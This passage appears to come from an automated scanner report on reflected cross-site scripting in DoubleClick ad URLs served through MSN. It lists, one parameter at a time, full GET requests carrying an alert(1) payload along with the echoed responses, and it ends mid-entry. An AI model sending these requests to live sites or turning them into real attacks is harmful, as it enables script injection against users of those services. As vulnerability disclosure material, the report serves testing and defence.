<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdh ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f26"-alert(1)-"730d1c99e22 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... JobMapFree_YahooTax_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c10f"-alert(1)-"a01146a9b07 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4995c"-alert(1)-"15005a1e215 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/j ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d7f"-alert(1)-"cc146351d59 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs%3D%3fhttp ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b59f2"-alert(1)-"a445a26e2b7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/ ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d1cb"-alert(1)-"68a2a9ab89b was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Scroll_FREE_N_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 121f1"-alert(1)-"a54ea376143 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/job_map_f?cid= ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1ecf"-alert(1)-"c71a3ff6507 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 7/TT_CoreGPS_JobMapFree_YahooTax_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B6243129 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b7d"-alert(1)-"d594f3953b8 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=843190458b7d"-alert(1)-"d594f3953b8&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cce8"-alert(1)-"9bf53ef1aeb was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=5711655104cce8"-alert(1)-"9bf53ef1aeb&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84d99"-alert(1)-"61719917f50 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e84d99"-alert(1)-"61719917f50&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54eb3"-alert(1)-"db1f9ed8dee was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR54eb3"-alert(1)-"db1f9ed8dee&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90776"-alert(1)-"bf4f4a050a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=836734390776"-alert(1)-"bf4f4a050a&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2b0c"-alert(1)-"b64a598cf19 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=Gb2b0c"-alert(1)-"b64a598cf19&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edbfd"-alert(1)-"dcc08de5e14 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=edbfd"-alert(1)-"dcc08de5e14 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 522ce"-alert(1)-"6f4be5c894c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!522ce"-alert(1)-"6f4be5c894c&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e97dd"-alert(1)-"9bf7dd8f0c5 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
